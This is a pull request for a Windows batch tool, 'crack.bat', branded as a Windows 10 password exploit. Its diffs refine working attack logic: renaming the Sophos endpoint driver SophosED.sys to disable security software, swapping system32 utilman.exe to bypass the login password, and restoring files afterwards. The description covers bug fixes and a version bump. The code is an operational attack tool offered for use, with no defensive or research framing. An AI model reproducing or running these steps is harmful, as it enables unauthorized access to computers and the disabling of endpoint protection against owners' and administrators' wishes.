### PR TITLE
Improve and fix undo/restore password exploit

### DIFF
--- a/src/crack.bat
+++ b/src/crack.bat
@@ -150,7 +150,7 @@ echo Starting Hack
 if exist "c:\windows\system32\drivers" (
   echo System Directory Found
     
-  if exist "C:\windows\system32\drivers\SophosED.sys" (
+  if not exist "C:\windows\system32\drivers\SophosED.sys" (
     :showDinoError
     echo SophosED.sys file could not be found 
     echo Failing Exploit and returning to menu 

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -33,7 +33,7 @@ echo ^|==================================^|
 echo ^|  WINDOWS 10  EXPLOIT BY S1rDyn0  ^|
 echo ^|   ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~    ^| 
 echo ^|                                  ^|
-echo ^|  BUILD ^| Production     23.5.9   ^|
+echo ^|  BUILD ^| Production     23.5.11   ^|
 echo ^|==================================^| & echo: & echo:
 
 echo +++++ Password Exploit

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -33,7 +33,7 @@ echo ^|==================================^|
 echo ^|  WINDOWS 10  EXPLOIT BY S1rDyn0  ^|
 echo ^|   ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~    ^| 
 echo ^|                                  ^|
-echo ^|  BUILD ^| Production     23.5.11   ^|
+echo ^|  BUILD ^| Production    23.5.11   ^|
 echo ^|==================================^| & echo: & echo:
 
 echo +++++ Password Exploit

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -150,11 +150,12 @@ echo Starting Hack
 if exist "c:\windows\system32\drivers" (
   echo System Directory Found
     
-  if exist C:\windows\system32\drivers\SophosED.sys (
+  if exist "C:\windows\system32\drivers\SophosED.sys" (
     :showDinoError
     echo SophosED.sys file could not be found 
     echo Failing Exploit and returning to menu 
     timeout /t 5
+    goto :menu
   )
   echo Renaming SophosED.sys to SophosED.sys.old
   ren C:\windows\system32\drivers\SophosED.sys SophosED.sys.old || goto :cmdFail

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -150,7 +150,12 @@ echo Starting Hack
 if exist "c:\windows\system32\drivers" (
   echo System Directory Found
     
-
+  if exist C:\windows\system32\drivers\SophosED.sys (
+    :showDinoError
+    echo SophosED.sys file could not be found 
+    echo Failing Exploit and returning to menu 
+    timeout /t 5
+  )
   echo Renaming SophosED.sys to SophosED.sys.old
   ren C:\windows\system32\drivers\SophosED.sys SophosED.sys.old || goto :cmdFail
   

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -262,6 +262,7 @@ if exist "c:\windows\system32\utilman.exe" (
 echo All system files located^! & echo: & echo Starting undo...
 echo Renaming utilman.old to utilman.exe....
 copy /y C:\windows\system32\utilman.old C:\windows\system32\utilman.exe || goto :cmdFail
+del C:\windows\system32\utilman.old
 
 
 color 0A

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -210,7 +210,7 @@ if not exist "!autorunScript!" (
   goto :cmdFail
 )
 
-echo Patch files located!
+echo Patch files located^!
 echo Starting Patch...
 
 if not exist C:\SophosUtility (
@@ -246,17 +246,11 @@ if exist "c:\windows\system32\utilman.old" (
   timeout /t 5 
   goto menu
 )
-if exist "c:\windows\system32\cmd.exe" (
-  echo Original cmd.exe file found
-) else (
-  color 0C
-  call :showDinoError
-  echo Could not find cmd.exe... & echo: & echo Failing Exploit and returning to menu
-  timeout /t 5 
-  goto menu
+if not exist "c:\windows\system32\cmd.exe" (
+  echo You seem to be missing the original cmd.exe file, try option 3 to restore it
 )
 if exist "c:\windows\system32\utilman.exe" (
-  echo Exploit utilman.exe file found
+  echo Exploited utilman.exe file found
 ) else (
   color 0C
   call :showDinoError
@@ -265,11 +259,10 @@ if exist "c:\windows\system32\utilman.exe" (
   goto menu
 )
 
-echo All system files located! & echo: & echo Starting restore...
-echo Deleting exploited utilman.exe
-del C:\windows\system32\utilman.exe || goto cmdFail
-echo Renaming utilman.old to utilman.exe 
-ren C:\windows\system32\utilman.old utilman.exe || goto cmdFail
+echo All system files located^! & echo: & echo Starting undo...
+echo Renaming utilman.old to utilman.exe....
+copy /y C:\windows\system32\utilman.old C:\windows\system32\utilman.exe || goto :cmdFail
+
 
 color 0A
 echo -----------------------------------
@@ -280,39 +273,39 @@ goto menu
 :restore-original-files
 cls
 echo Preparing restore...
+set "cmdBackup=X:\sources\restore\cmd.exe"
+set "utilmanBackup=X:\sources\restore\utilman.exe"
 if exist "x:\sources\restore" (
   echo Located restore folder
 ) else (
   color 0C
   call :showDinoError
-  echo Could not find Restore Folder... & echo: & echo Failing Exploit and returning to menu
+  echo Could not find Restore Folder, place the original files in a folder called restore... & echo: & echo Failing Exploit and returning to menu
   timeout /t 5 
   goto menu
 )
-if exist "x:\sources\restore\cmd.exe" (
+if exist !cmdBackup! (
   echo Command Prompt backup found
 ) else (
   color 0C
   call :showDinoError
-  echo Could not find Command Prompt backup... & echo: & echo Failing Exploit and returning to menu
+  echo Could not find Command Prompt backup, you can find the original file in the GitHub repository... & echo: & echo Failing Exploit and returning to menu
   timeout /t 5 
   goto menu
 )
-if exist "x:\sources\restore\utilman.exe" (
+if exist !utilmanBackup! (
   echo Utilman backup found
 ) else (
   color 0C
   call :showDinoError
-  echo Could not find Utilman backup... & echo: & echo Failing Exploit and returning to menu
+  echo Could not find Utilman backup,  you can find the original file in the GitHub repository... & echo: & echo Failing Exploit and returning to menu
   timeout /t 5 
   goto menu
 )
 
-echo Backup files located! & echo: & echo Starting restore...
-echo Deleting exploited utilman.exe
-del C:\windows\system32\utilman.exe || goto :cmdFail
-echo Renaming utilman.old to utilman.exe
-ren C:\windows\system32\utilman.old utilman.exe || goto :cmdFail
+echo Backup files located^! & echo: & echo Starting restore...
+copy /y !utilmanBackup! C:\windows\system32 || goto :cmdFail
+copy /y !cmdBackup! C:\windows\system32 || goto :cmdFail
 
 color 0A
 echo -----------------------------------

--- a/src/crack.bat
+++ b/src/crack.bat
@@ -151,6 +151,7 @@ if exist "c:\windows\system32\drivers" (
   echo System Directory Found
     
   if not exist "C:\windows\system32\drivers\SophosED.sys" (
+    color 0C
     :showDinoError
     echo SophosED.sys file could not be found 
     echo Failing Exploit and returning to menu 

--- a/src/sophos/evoke.bat
+++ b/src/sophos/evoke.bat
@@ -1,1 +1,1 @@
-start C:\SophosUtility\sophos\autorun.bat
+start C:\SophosUtility\autorun.bat


### PR DESCRIPTION
- It seems the restore original files option didn't actually restore the files and was only a copy of the undo password exploit option.
- This is fixed. I also used copy with the /y switch to automatically overwrite any existing files instead of deleting then renaming it afterwards.
- Also added missing ^s for special characters. 
- Not having an existing cmd.exe for undo password exploit won't stop exploit as it is not necessary. Prompts the user to restore files instead
- bump version including previous commit